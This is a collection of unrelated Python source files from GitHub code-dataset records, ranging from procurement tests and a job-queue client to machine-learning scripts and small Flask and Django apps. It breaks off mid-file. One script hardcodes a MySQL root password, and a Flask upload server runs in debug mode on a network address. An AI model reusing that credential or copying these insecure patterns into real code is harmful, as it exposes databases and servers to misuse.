snitch(create_tender_bidder_feature_invalid)\n test_create_tender_bidder = snitch(create_tender_bidder_feature)\n\n\nclass TenderLotProcessTest(BaseTenderUAContentWebTest, TenderLotProcessTestMixin, TenderUALotProcessTestMixin):\n setUp = BaseTenderUAContentWebTest.setUp\n initial_data = test_tender_data\n\n days_till_auction_starts = 6\n\n test_lots_data = test_lots # TODO: change attribute identifier\n test_1lot_1bid = snitch(one_lot_1bid)\n test_2lot_1bid_0com_1can = snitch(two_lot_1bid_0com_1can)\n test_2lot_1bid_2com_1win = snitch(two_lot_1bid_2com_1win)\n test_2lot_1bid_0com_0win = snitch(two_lot_1bid_0com_0win)\n test_2lot_1bid_1com_1win = snitch(two_lot_1bid_1com_1win)\n test_2lot_2bid_on_first_and_1_on_second_awarding = snitch(two_lot_2bid_on_first_and_1_on_second_awarding)\n\n\ndef suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(TenderLotResourceTest))\n suite.addTest(unittest.makeSuite(TenderLotBidderResourceTest))\n suite.addTest(unittest.makeSuite(TenderLotFeatureBidderResourceTest))\n suite.addTest(unittest.makeSuite(TenderLotProcessTest))\n return suite\n\n\nif __name__ == \"__main__\":\n unittest.main(defaultTest=\"suite\")\n","repo_name":"openprocurement/ProzorroUKR-openprocurement.api","sub_path":"src/openprocurement/tender/openuadefense/tests/lot.py","file_name":"lot.py","file_ext":"py","file_size_in_byte":5674,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"91"}
+{"seq_id":"29139107425","text":"# This file is part of eventmq.\n#\n# eventmq is free software: you can redistribute it and/or modify it under the\n# terms of the GNU Lesser General Public License as published by the Free\n# Software Foundation, either version 2.1 of the License, or (at your option)\n# any later version.\n#\n# eventmq is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with eventmq. If not, see .\n\"\"\"\n:mod:`messages` -- Client Messaging\n===================================\n\"\"\"\nfrom json import dumps as serialize\nimport logging\n\nfrom past.builtins import basestring\n\nfrom .. import conf\nfrom ..utils.functions import name_from_callable, split_callable_name\nfrom ..utils.messages import send_emqp_message\n\nlogger = logging.getLogger(__name__)\n\n\ndef schedule(socket, func, interval_secs=None, args=(), kwargs=None,\n class_args=(), class_kwargs=None, headers=('guarantee',),\n queue=conf.DEFAULT_QUEUE_NAME, unschedule=False, cron=None):\n \"\"\"\n Execute a task on a defined interval.\n\n .. note::\n\n All passed class & fuction kwargs/args MUST be json serializable.\n\n Args:\n socket (socket): eventmq socket to use for sending the message\n func (callable): the callable (or string path to calable) to be\n scheduled on a worker\n interval_secs (int): Run job every interval_secs or None if using cron\n args (list): list of *args to pass to the callable\n cron (string): cron formatted string used for job schedule if\n interval_secs is None, i.e. '* * * * *' (every minute)\n kwargs (dict): dict of **kwargs to pass to the callable\n class_args (list): list of *args to pass to the class (if applicable)\n class_kwargs (dict): dict of **kwargs to pass to the class (if\n applicable)\n headers (list): list of strings denoting enabled headers. Default:\n guarantee is enabled to ensure the scheduler schedules the job.\n queue (str): name of the queue to use when executing the job. The\n default value is the default queue.\n Raises:\n TypeError: When one or more parameters are not JSON serializable.\n Returns:\n str: ID of the schedule message that was sent. None if there was an\n error\n \"\"\"\n if not class_kwargs:\n class_kwargs = {}\n if not kwargs:\n kwargs = {}\n\n if not unschedule and \\\n ((interval_secs and cron) or (not interval_secs and not cron)):\n logger.error('You must sepcify either `interval_secs` or `cron`, '\n 'but not both (or neither)')\n return\n\n if func and isinstance(func, basestring):\n if '.' not in func:\n logger.error('Invalid callable string passed, '\n 'absolute path required: \"{}\"'.format(func))\n return\n path, callable_name = split_callable_name(func)\n elif callable(func):\n callable_name = name_from_callable(func)\n path, callable_name = split_callable_name(callable_name)\n else:\n logger.error('Encountered non-callable func: {}'.format(func))\n return\n\n if not callable_name or not path:\n logger.error('Encountered invalid callable, will not proceed.')\n return\n\n # TODO: convert all the times to seconds for the clock\n msg = ['run', {\n 'callable': callable_name,\n 'path': path,\n 'args': args,\n 'kwargs': kwargs,\n 'class_args': class_args,\n 'class_kwargs': class_kwargs,\n }]\n\n msgid = send_schedule_request(socket, interval_secs=interval_secs or -1,\n cron=cron or '',\n message=msg, headers=headers, queue=queue,\n unschedule=unschedule)\n\n # TODO: Return msgid only if we got some sort of ACK\n return msgid\n\n\ndef defer_job(\n socket, func, args=(), kwargs=None, class_args=(),\n class_kwargs=None, reply_requested=False, guarantee=False,\n retry_count=0, timeout=0, debounce_secs=False,\n queue=conf.DEFAULT_QUEUE_NAME):\n \"\"\"\n Used to send a job to a worker to execute via `socket`.\n\n This tries not to raise any exceptions so use some of the message flags to\n guarentee things.\n\n .. note::\n\n All passed class & fuction kwargs/args MUST be json serializable.\n\n Args:\n socket (socket): eventmq socket to use for sending the message\n func (callable or str): the callable (or string path to callable) to be\n deferred to a worker\n args (list): list of *args for the callable\n kwargs (dict): dict of **kwargs for the callable\n class_args (list): list of *args to pass to the the class when\n initializing (if applicable).\n class_kwargs (dict): dict of **kwargs to pass to the class when\n initializing (if applicable).\n reply_requested (bool): request the return value of func as a reply\n retry_count (int): How many times should be retried when encountering\n an Exception or some other failure before giving up. (default: 0\n or immediately fail)\n timeout (int): How many seconds should we wait before killing the job\n default: 0 which means infinite timeout\n debounce_secs (secs): Number of seconds to debounce the job. See\n `debounce_deferred_job` for more information.\n queue (str): Name of queue to use when executing the job. If this value\n evaluates to False, the default is used. Default: is configured\n default queue name\n Raises:\n TypeError: When one or more parameters are not JSON serializable.\n Returns:\n str: ID for the message/deferred job. This value will be None if there\n was an error.\n \"\"\"\n callable_name = None\n path = None\n\n # Just incase this was passed None\n if not queue:\n queue = conf.DEFAULT_QUEUE_NAME\n\n if not class_kwargs:\n class_kwargs = {}\n\n if not kwargs:\n kwargs = {}\n\n if func and isinstance(func, basestring):\n if '.' not in func:\n logger.error('Invalid callable string passed, '\n 'absolute path required: \"{}\"'.format(func))\n return\n path, callable_name = split_callable_name(func)\n elif callable(func):\n callable_name = name_from_callable(func)\n path, callable_name = split_callable_name(callable_name)\n else:\n logger.error('Encountered non-callable func: {}'.format(func))\n return\n\n if not callable_name or not path:\n logger.error('Encountered invalid callable, will not proceed.')\n return\n\n msg = ['run', {\n 'callable': callable_name,\n 'path': path,\n 'args': args,\n 'kwargs': kwargs,\n 'class_args': class_args,\n 'class_kwargs': class_kwargs,\n }]\n\n msgid = send_request(socket, msg,\n reply_requested=reply_requested,\n guarantee=guarantee,\n retry_count=retry_count,\n timeout=timeout,\n queue=queue)\n\n return msgid\n\n\ndef send_request(socket, message, reply_requested=False, guarantee=False,\n retry_count=0, timeout=0, queue=None):\n \"\"\"\n Send a REQUEST command.\n\n Default headers are always all disabled by default. If they are included in\n the headers then they have been enabled.\n\n To execute a task, the message should be formatted as follows:\n {subcommand(str), {\n # dot path location where callable can be imported. If callable is a\n # method on a class, the class should always come last, and be\n # seperated with a colon. (So we know to instantiate on the receiving\n # end)\n 'path': path(str),\n # function or method name to run\n 'callable': callable(str),\n # Optional args for callable\n 'args': (arg, arg),\n # Optional kwargs for callable\n 'kwargs': {'kwarg': kwarg},\n # Optional class args, kwargs\n 'class_args': (arg2, arg3),\n 'class_kwargs': {'kwarg2': kwarg}\n\n }\n }\n Args:\n socket: Socket (Sender or Receiver) to use when sending `message`\n message: message to send to `socket`\n reply_requested (bool): request the return value of func as a reply\n guarantee (bool): (Give your best effort) to guarantee that func is\n executed. Exceptions and things will be logged.\n retry_count (int): How many times should be retried when encountering\n an Exception or some other failure before giving up. (default: 0\n or immediately fail)\n timeout (int): How many seconds should we wait before killing the job\n default: 0 which means infinite timeout\n queue (str): Name of queue to use when executing the job. Default: is\n configured default queue name\n\n Returns:\n str: ID of the message\n \"\"\"\n headers = []\n\n if reply_requested:\n headers.append('reply-requested')\n\n if guarantee:\n headers.append('guarantee')\n\n if retry_count > 0:\n headers.append('retry-count:%d' % retry_count)\n\n if timeout > 0:\n headers.append('timeout:%d' % timeout)\n\n msgid = send_emqp_message(socket, 'REQUEST',\n (queue or conf.DEFAULT_QUEUE_NAME,\n \",\".join(headers),\n serialize(message)))\n\n return msgid\n\n\ndef send_schedule_request(socket, message, interval_secs=-1, headers=(),\n queue=None, unschedule=False, cron=''):\n \"\"\"\n Send a SCHEDULE or UNSCHEDULE command.\n\n Queues a message requesting that something happens on an\n interval for the scheduler.\n\n Args:\n socket (socket):\n job_schedule (str)\n message: Message to send socket.\n headers (list): List of headers for the message\n queue (str): name of queue the job should be executed in\n Returns:\n str: ID of the message\n \"\"\"\n\n if unschedule:\n command = 'UNSCHEDULE'\n else:\n command = 'SCHEDULE'\n\n msgid = send_emqp_message(socket, command,\n (queue or conf.DEFAULT_QUEUE_NAME,\n ','.join(headers),\n str(interval_secs),\n serialize(message),\n cron))\n\n return msgid\n\n\ndef send_publish_request(socket, topic, message):\n\n msgid = send_emqp_message(socket, 'PUBLISH',\n (topic,\n serialize(message), ))\n\n return msgid\n","repo_name":"eventmq/eventmq","sub_path":"eventmq/client/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":10986,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"91"}
+{"seq_id":"73444402863","text":"#!/usr/bin/env python3\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.datasets import load_breast_cancer\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\n\nimport random\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns; sns.set()\n\nimport time\n\nimport numpy as np\ndef trainAndTest(train, test, train_labels, test_labels, label_names, labels, feature_names, features, run_number):\n incorrect_preds = {}\n bad_preds_file = open(\"BadPredictionsOut.txt\", \"a\")\n \n gnb = GaussianNB()\n\n model = gnb.fit(train, train_labels)\n preds = gnb.predict(test)\n for i in range(len(preds)):\n if preds[i] != test_labels[i]:\n incorrect_preds[i] = \"Tumor Number \" + str(i) + \" was predicted to be \" + str(label_names[preds[i]]).upper() + \" but was actaully \" + str(label_names[test_labels[i]]).upper() + \"\\n\"\n bad_preds_file.write(\"{:*^20}\\n\".format(\"Run {}\".format(run_number)))\n bad_preds_file.write(\"Number of Incorrect Preditions {}\\n\".format(len(incorrect_preds)))\n if len(incorrect_preds) > 0:\n for key in incorrect_preds:\n bad_preds_file.write(incorrect_preds[key])\n bad_preds_file.write(\"{:*^20}\\n\\n\".format(\"END RUN {}\".format(run_number)))\n mat = confusion_matrix(preds, test_labels)\n return accuracy_score(test_labels, preds), mat, label_names, len(incorrect_preds)\n\ndef main():\n mean_accuracy = 0\n mat = np.empty(shape=(2, 2)).tolist()\n names = []\n summary_file = open(\"BenchmarkOutputSummary.txt\", \"w\")\n\n #load data\n data = load_breast_cancer()\n\n\n #organize data\n label_names = data['target_names']\n labels = data['target']\n feature_names = data['feature_names']\n features = data['data']\n max_fuckups = 0\n min_fuckups = 1000000000\n summary_list = []\n max_accuracy = 0\n min_accuracy = 10000000\n\n #print(feature_names)\n print(\"Number of tumors {:>7}\".format(569))\n print(\"Number of Features {:>6}\".format(len(feature_names)))\n print(\"Total Data Points {:>7}\".format(569*len(feature_names)))\n print(\"Total Predictions {:>7}\".format(\"~180000\"))\n confusion_matrix = [0]\n graph_names = []\n for i in range(1, 1000):\n # Split our data\n train, test, train_labels, test_labels = train_test_split(features, labels, test_size=0.33, random_state=random.randint(1,1000))\n\n #print(\"{:*^20}\".format(\"Run # {}:\".format(i)))\n run_accuracy, tmp_mat, names, num_incorrect_preds = trainAndTest(train, test, train_labels, test_labels, label_names, labels, feature_names, features, i)\n mean_accuracy += run_accuracy\n if num_incorrect_preds > max_fuckups:\n max_fuckups = num_incorrect_preds\n min_accuracy = run_accuracy\n if num_incorrect_preds < min_fuckups:\n min_fuckups = num_incorrect_preds\n max_accuracy = run_accuracy\n if len(confusion_matrix) == 1:\n confusion_matrix = tmp_mat\n else:\n confusion_matrix = confusion_matrix + tmp_mat\n #print(\"{:*^20}\".format(\"Run Accuracy: {}\".format(run_accuracy)))\n summary_list.append(\"Run {0:<10} Accuracy: {1:<15}\\t{2:>15} wrong predictions\\n\".format(i, run_accuracy, num_incorrect_preds))\n mean_accuracy = mean_accuracy/1000\n print(\"\\nTotal Mean Accuracy for 1000 runs: {}\\n\".format(mean_accuracy))\n print(\"Highest Number of wrong predictions: {0:<10} Accuracy: {1:<10}\\nLowest Number of wrong predictions: {2:<11} Accuracy: {3:<10}\".format(max_fuckups, min_accuracy, min_fuckups, max_accuracy))\n summary_file.write(\"{:*^30}\\n\".format(\" SUMMARY \"))\n summary_file.write(\"Total Mean Accuracy for 1000 runs: {}\\n\".format(mean_accuracy))\n summary_file.write(\"Highest Number of wrong predictions: {0}\\n Lowest Number of wrong predictions: {1}\\n\".format(max_fuckups, min_fuckups))\n summary_file.write(\"{:*^30}\\n\\n\".format(\" END SUMMARY \"))\n summary_file.write(\"{:*^30}\\n\".format(\" INDIVIDUAL RUN DATA \"))\n for summary in summary_list:\n summary_file.write(summary)\n sns.heatmap(confusion_matrix, square=True, annot=True, fmt='d', cbar=False, xticklabels=names, yticklabels=names)\n\n plt.ylabel('Predicted')\n plt.xlabel('Actual')\n plt.savefig(\"BenchmarkHeatMap.png\")\n plt.show()\n\nmain()\n","repo_name":"KevinGConyers/COMP5130-Project-Code","sub_path":"Benchmark.py","file_name":"Benchmark.py","file_ext":"py","file_size_in_byte":4332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"16357472895","text":"def subset(B, k, n, A, soma, r):\n\tif soma == r:\n\t\treturn 1\n\telse:\n\t\tif k+1 < n:\n\t\t\tB[k] = True\t\t\n\t\t\tr1 = subset(B, k+1, n, A, soma + A[k], r)\n\t\t\tB[k]= False\n\t\t\tr2 = subset(B, k+1, n, A, soma, r)\n\t\t\treturn r1 or r2\t\n\t\telse:\n\t\t\treturn 0\n\nwhile True:\n\ttry:\n\t\tentry = input().split(' ')\n\t\tR = int(entry[0])\n\t\tK = int(entry[1])\n\n\t\tB = []\n\t\tA = []\n\t\tfor i in range(R):\n\t\t\tB.append(False)\n\t\t\tA.append(0)\n\n\t\tfor i in range(K):\n\t\t\tentry = input().split(' ')\n\t\t\tA[int(entry[0]) - 1] += 1\n\t\t\tA[int(entry[1]) - 1] += 1\n\t\t#print('A:', A)\n\n\t\tif subset(B, 0, R, A, 0, K):\n\t\t\tprint('S')\n\t\telse:\n\t\t\tprint('N')\n\texcept EOFError:\n\t\tbreak\n","repo_name":"GabrielEstevam/icpc_contest_training","sub_path":"uri/uri_python/paradigmas/p1203_2.py","file_name":"p1203_2.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
+{"seq_id":"24891080784","text":"#Extracting Data from JSON\n\nimport urllib.parse, urllib.error, urllib.request\nimport json\n\nurl = input('Enter location: ')\n\ntry:\n handle = urllib.request.urlopen(url)\nexcept:\n print('Invalid URL.')\n quit()\n\nprint('Retrieving', url)\n\ndata = handle.read().decode()\n\nprint('Retrieved', len(data), 'characters')\n\njs = json.loads(data)\n\nprint('Count:', len(js['comments']))\n\ns = 0\n\nfor comm in js['comments']:\n s += int(comm['count'])\n\nprint('Sum', s)\n","repo_name":"andrei-micuda/py4e","sub_path":"13.Web/json.py","file_name":"json.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"28276093389","text":"from django.shortcuts import render, HttpResponse\nfrom home.models import Contact\nfrom django.contrib import messages\n# Create your views here.\n\ndef index(request):\n context ={\n \"variable\": \"This is variable\"\n }\n return render(request,'index.html',context)\n \ndef about(request):\n if request.method == 'POST':\n name = request.POST.get('name1')\n email = request.POST.get('email1')\n desc = request.POST.get('feedback')\n contact = Contact(name=name, email=email, desc= desc)\n contact.save()\n messages.success(request, 'Your response has been submitted')\n return render(request,'about.html')\n","repo_name":"purohit-arun/Django-Site","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"32382486155","text":"from __future__ import absolute_import\nimport tensorflow as tf\nimport numpy as np\n\nimport _settings\nimport transforms\nimport conditionals\nimport kullback_leiblers\nfrom mean_functions import Zero\nfrom models import GPModel\n\n\nclass SVGP(GPModel):\n \"\"\"\n This is the Sparse Variational GP (SVGP). The key reference is\n\n ::\n\n @inproceedings{hensman2014scalable,\n title={Scalable Variational Gaussian Process Classification},\n author={Hensman, James and Matthews,\n Alexander G. de G. and Ghahramani, Zoubin},\n booktitle={Proceedings of AISTATS},\n year={2015}\n }\n\n \"\"\"\n def __init__(self, X, Y, kern, likelihood, Z,\n mean_function=None,\n num_latent=None,\n q_diag=False,\n whiten=True,\n minibatch_size=None,\n **kwargs):\n \"\"\"\n - X is a data matrix, size N x D\n - Y is a data matrix, size N x R\n - kern, likelihood, mean_function are appropriate GPflow objects\n - Z is a matrix of pseudo inputs, size M x D\n - num_latent is the number of latent process to use, default to\n Y.shape[1]\n - q_diag is a boolean. If True, the covariance is approximated by a\n diagonal matrix.\n - whiten is a boolean. If True, we use the whitened representation of\n the inducing points.\n \"\"\"\n # sort out the X, Y into MiniBatch objects if required.\n GPModel.__init__(self, X, Y, kern, likelihood, mean_function, **kwargs)\n \n # init the super class, accept args\n self.num_data = int(X.shape[0])\n self.q_diag, self.whiten = q_diag, whiten\n self.Z = tf.Variable(Z, dtype=_settings.tf_float)\n self.num_latent = num_latent or int(Y.shape[1])\n self.num_inducing = Z.shape[0]\n\n # init variational parameters\n self.q_mu = tf.Variable(np.zeros((self.num_inducing, self.num_latent)), dtype=_settings.tf_float)\n if self.q_diag:\n self.q_sqrt_temp = tf.Variable(np.ones((self.num_inducing, self.num_latent)), dtype=_settings.tf_float)\n self.q_sqrt = tf.square(self.q_sqrt_temp)\n else:\n self.q_sqrt_temp = np.array([np.eye(self.num_inducing)\n for _ in range(self.num_latent)]).swapaxes(0, 2)\n# self.q_sqrt_temp = transforms.LowerTriangular(self.num_inducing, self.num_latent).backward(self.q_sqrt_temp)\n# self.q_sqrt = tf.Variable(tf.contrib.linalg.LinearOperatorTriL(q_sqrt).to_dense())\n self.q_sqrt = tf.Variable(self.q_sqrt_temp, dtype=_settings.tf_float)\n\n def build_prior_KL(self):\n if self.whiten:\n if self.q_diag:\n KL = kullback_leiblers.gauss_kl_white_diag(self.q_mu, self.q_sqrt)\n else:\n KL = kullback_leiblers.gauss_kl_white(self.q_mu, self.q_sqrt)\n else:\n K = self.kern.K(self.Z) + tf.eye(self.num_inducing, dtype=_settings.tf_float) * _settings.jitter_level\n if self.q_diag:\n KL = kullback_leiblers.gauss_kl_diag(self.q_mu, self.q_sqrt, K)\n else:\n KL = kullback_leiblers.gauss_kl(self.q_mu, self.q_sqrt, K)\n return KL\n\n def _build_likelihood(self):\n \"\"\"\n This gives a variational bound on the model likelihood.\n \"\"\"\n\n # Get prior KL.\n KL = self.build_prior_KL()\n\n # Get conditionals\n fmean, fvar = self._build_predict(self.X, full_cov=False)\n\n # Get variational expectations.\n var_exp = self.likelihood.variational_expectations(fmean, fvar, self.Y)\n\n # re-scale for minibatch size\n scale = tf.cast(self.num_data, _settings.tf_float) / tf.cast(tf.shape(self.X)[0], _settings.tf_float)\n\n return tf.reduce_sum(var_exp) * scale - KL\n\n def _build_predict(self, Xnew, full_cov=False):\n mu, var = conditionals.conditional(Xnew, self.Z, self.kern, self.q_mu,\n q_sqrt=self.q_sqrt, full_cov=full_cov, whiten=self.whiten)\n return mu + self.mean_function(Xnew), var\n","repo_name":"AlexLewandowski/flw","sub_path":"flw/models/svgp.py","file_name":"svgp.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"36316866627","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 2 17:55:38 2020\n\n@author: jha\n\n\"\"\"\n\n#%%\nimport csv\nimport mysql.connector as mariadb\nfrom tabulate import tabulate\nimport pandas as pd\n\namrdb= mariadb.connect(\n host=\"localhost\",\n user=\"root\",\n passwd=\"Sukhoi@90\",\n database =\"myamr\"\n )\ncursor = amrdb.cursor(buffered=True) # else it fetches one row for everytime it is executed \nprint(\"We are at line 31 we have connection, lets begin\")\n\n#%%\n\n\n#get the data from the ast table to make the dataframe \n#%%\nimport pandas as pd\nnumrows= cursor.execute(\"SELECT `Lat/Lon` FROM EcoliIBisodatlocmerge group by `Lat/Lon` limit 10\")\nprint(\"Selected %s rows\" %numrows)\nprint(\"Selected %s rows \" %cursor.rowcount)\nrows =cursor.fetchall()#fetch all rows at once\n#print(tabulate(rows, headers=['AST_phenotype'], tablefmt='psql'))\ndf = pd.DataFrame(rows)\ndf.columns=[\"LL\"]\n#%%\n\n\n#%%\n\nfrom geopy.geocoders import Nominatim \ngeolocator = Nominatim(user_agent=\"geoapiExercises\") \ndef city_state_country(coord): \n location = geolocator.reverse(coord, exactly_one=True) \n address = location.raw['address']\n state = address.get('state', '') \n return state \nlist_ll=df[\"LL\"].to_list()\nlist_l = ['0' if x is None else x for x in list_ll]\nfor i in list_l: \n try:\n l=city_state_country(i)\n print(l,i)\n \n \n except:\n print(\"missing values\")\n continue\n\n\n\n#%%","repo_name":"venomj26/AMR","sub_path":"reversegeomapping.py","file_name":"reversegeomapping.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"13944123179","text":"# CODE FOR SERIAL COMMUNICATION BETWEEN RASPBERRY AND ARDUINO UNO\nimport serial,time\n\nser = serial.Serial(port='COM1', baudrate=9600, timeout=10) # specify serial port and bauderate\nprint(ser.name) # check which port is really used\n\nwhile 1:\n line = str(ser.read(3))\n #print(line)\n i = line.find(\"0\")\n if i<0:\n i = line.find(\"1\")\n if i>=0:\n num = int(line[i:i+1])\n print(num)\n #time.sleep(1) # sleep 1 seconds\n\nser.close() ##Only executes once the loop exits","repo_name":"AmI-2018/YSDI-code","sub_path":"MultiThreading/Arduino_Raspberry/Serial_connection/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
+{"seq_id":"39000297566","text":"\"\"\" Transitive-Inference model implementation.\n\"\"\"\nimport ccobra\nimport random\nimport math\nfrom modelfunctions import * \n\nclass BushMosteller(ccobra.CCobraModel):\n \"\"\" News reasoning CCOBRA implementation.\n \"\"\"\n\n def __init__(self, name='Bush-Mosteller-Wynne95'):\n \"\"\" Initializes the news reasoning model.\n Parameters\n ----------\n name : str\n Unique name of the model. Will be used throughout the ORCA\n framework as a means for identifying the model.\n \"\"\"\n self.Db = 0.125 #rate parameter for the effect of nonreward.\n self.V = {} #ranks\n self.vInit = 0.001\n self.lastChosen = None\n super().__init__(name, ['spatial-relational'], ['single-choice'])\n\n def predict(self, item, **kwargs):\n left, right = int(item.choices[0][0][0]), int(item.choices[1][0][0])\n X, Y = left, right\n r = self.v(X)/max(self.v(X) + self.v(Y), 0.00001)\n if r >= 0.5:\n if random.random() < 0.5 + 0.883*pow(2*r-1,0.75):\n chosen = int(left)\n else:\n chosen= int(right)\n else:\n if random.random() < 0.5 - 0.883*pow(1-2*r,0.75):\n chosen = int(left)\n else:\n chosen = int(right)\n return chosen\n\n def predictS(self, itemPair):\n left, right = int(itemPair[0]), int(itemPair[1])\n X, Y = left, right\n r = float(self.v(X))/max(self.v(X) + self.v(Y),0.00001)# if (self.v(X) + self.v(Y)) > self.v(X) else int(self.v(X)!=0)\n if r >= 0.5:\n return 0.5 + 0.883*pow(2*r-1,0.75)\n return 0.5 - 0.883*pow(1-2*r,0.75)\n def adaptS(self, itemPair):\n left, right = int(itemPair[0]), int(itemPair[1])\n if correctReply((left, right)) == str(left):\n self.V[left] = self.Db*(1-self.v(left)) + self.v(left)\n self.V[right] = (-1)*self.Db*self.v(right) + self.v(right)\n elif correctReply((left, right)) == str(right):\n self.V[left] = (-1)*self.Db*self.v(left) + self.v(left)\n self.V[right] = self.Db*(1-self.v(right)) + self.v(right)\n else:\n print('error')\n def adapt(self, item, target, **kwargs):\n left, right = int(item.choices[0][0][0]), int(item.choices[1][0][0])\n if correctReply((left, right)) == str(left):\n self.V[left] = self.Db*(1-self.v(left)) + self.v(left)\n self.V[right] = (-1)*self.Db*self.v(right) + self.v(right)\n elif correctReply((left, right)) == str(right):\n self.V[left] = (-1)*self.Db*self.v(left) + self.v(left)\n self.V[right] = self.Db*(1-self.v(right)) + self.v(right)\n else:\n print('error')\n \n def v(self, item):\n if item not in self.V.keys():\n self.V[item] = self.vInit\n return self.V[item]\n \n","repo_name":"CognitiveComputationLab/cogmods","sub_path":"relational/student_projects/2020_borukhson/models/TransitiveInference/BushMosteller.py","file_name":"BushMosteller.py","file_ext":"py","file_size_in_byte":2896,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"18888579811","text":"import flask\nimport werkzeug\nimport time\nfrom flask import Flask, request, Response\nimport numpy as np\nimport cv2\n\n\napp = flask.Flask(__name__)\n\n# route http posts to this method\n@app.route('/', methods=['GET','POST'])\ndef handle_request(): \n files_ids = list(flask.request.files)\n print(\"\\nNumber of Received Images : \", len(files_ids))\n image_num = 1\n for file_id in files_ids:\n print(\"\\nSaving Image \", str(image_num), \"/\", len(files_ids))\n imagefile = flask.request.files[file_id]\n filename = werkzeug.utils.secure_filename(imagefile.filename)\n print(\"Image Filename : \" + imagefile.filename)\n timestr = time.strftime(\"%Y%m%d-%H%M%S\")\n imagefile.save(timestr+'_'+filename)\n image_num = image_num + 1\n print(\"\\n\")\n return \"Image(s) Uploaded Successfully. Come Back Soon.\"\n\n# Use your ip address host = 'ipv4 address' or host = '0.0.0.0'\napp.run(port=5000, host='192.168.43.124', debug=True)\n","repo_name":"ak224001/Andriod-and-Flask-Server","sub_path":"Sever/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"742910519","text":"import json\nimport random\nfrom exceptions import TrackNotFoundError, DuplicateIDError\n\nPOUND_TEMPLATE_LOCATION = '../json/pound_setlist_template.json'\nPOUND_TRACK_LIST_LOCATION = '../json/pound_track_list.json'\n\ndef build_pound_setlist(difficulty, length, version, include_arm_track):\n \"\"\" Creates setlist for current template and vars \"\"\"\n template = _parse_pound_setlist_template(difficulty, length, version)\n setlist = []\n for slot in template:\n setlist_track = _build_new_track(setlist, slot, include_arm_track)\n setlist.append(setlist_track)\n return setlist\n\ndef _parse_pound_setlist_template(difficulty, length, version):\n \"\"\" Transform setlist from JSON file text to JSON object as global var \"\"\"\n with open(POUND_TEMPLATE_LOCATION, 'r', encoding='UTF-8') as template_file:\n data = template_file.read()\n template_file.close()\n data_json = json.loads(data)\n template = data_json[difficulty][length][version]\n return template\n\ndef _build_new_track(setlist, track_template, include_arm_track):\n \"\"\" Chooses and builds a single setlist track, after filtering for dupes and requirements\"\"\"\n track_type = track_template['type']\n track_level = None\n if 'level' in track_template:\n track_level = track_template['level']\n track_options = _parse_pound_track_list(track_type, track_level)\n\n is_arm_track = False\n if 'canBeArmTrack' in track_template and include_arm_track:\n track_options = list(filter(lambda track: track['canBeArmTrack'] is True, track_options))\n is_arm_track = True\n\n track_options = _filter_duplicates(setlist, track_options)\n \n if len(track_options) == 0:\n raise TrackNotFoundError(f'No track available of type {track_type} with level {track_level} for slot {track_template}.\"')\n\n chosen_track = track_options[random.randrange(0, len(track_options))]\n\n new_track = {}\n new_track['type'] = track_type\n new_track['level'] = track_level\n new_track['name'] = chosen_track['name']\n new_track['artist'] = chosen_track['artist']\n new_track['isArmTrack'] = is_arm_track\n new_track['id'] = chosen_track['id']\n\n return new_track\n\ndef _parse_pound_track_list(track_type, track_level):\n \"\"\" Transforms known tracks from JSON file text to JSON object \"\"\"\n with open(POUND_TRACK_LIST_LOCATION, 'r', encoding='UTF-8') as pound_track_list_file:\n data = pound_track_list_file.read()\n pound_track_list_file.close()\n\n data_json = json.loads(data)\n try:\n pound_track_list = data_json[str(track_type)]\n except KeyError as exc:\n raise TrackNotFoundError(f'No track of type {track_type} available in list of known songs. Please choose a different setlist or update the song list.') from exc\n\n if track_level:\n try:\n pound_track_list = pound_track_list[str(track_level)]\n except KeyError as exc:\n raise TrackNotFoundError(f'No track of type {track_type} with level {track_level} available in list of known songs. Please choose a different setlist or update the song list.') from exc\n return pound_track_list\n\ndef get_pound_replacement_track_options(setlist, track_num, include_arm_track, difficulty, length, version):\n \"\"\" Gets list of tracks with same params as given track_num \"\"\"\n\n # get old track details\n track_index = int(track_num) - 1\n old_track = setlist[track_index]\n track_type = old_track['type']\n track_level = old_track['level']\n\n # get user choice\n track_options = _parse_pound_track_list(track_type, track_level)\n template = _parse_pound_setlist_template(difficulty, length, version)\n if 'canBeArmTrack' in template[track_index] and include_arm_track:\n track_options = list(filter(lambda track: track['canBeArmTrack'] is True, track_options))\n\n # filter duplicates\n track_options = _filter_duplicates(setlist, track_options)\n\n return track_options\n\ndef _filter_duplicates(setlist, options):\n \"\"\" Filters duplicate songs out of list based on id \"\"\"\n ids_in_setlist = list(map(lambda track: track['id'], setlist))\n return 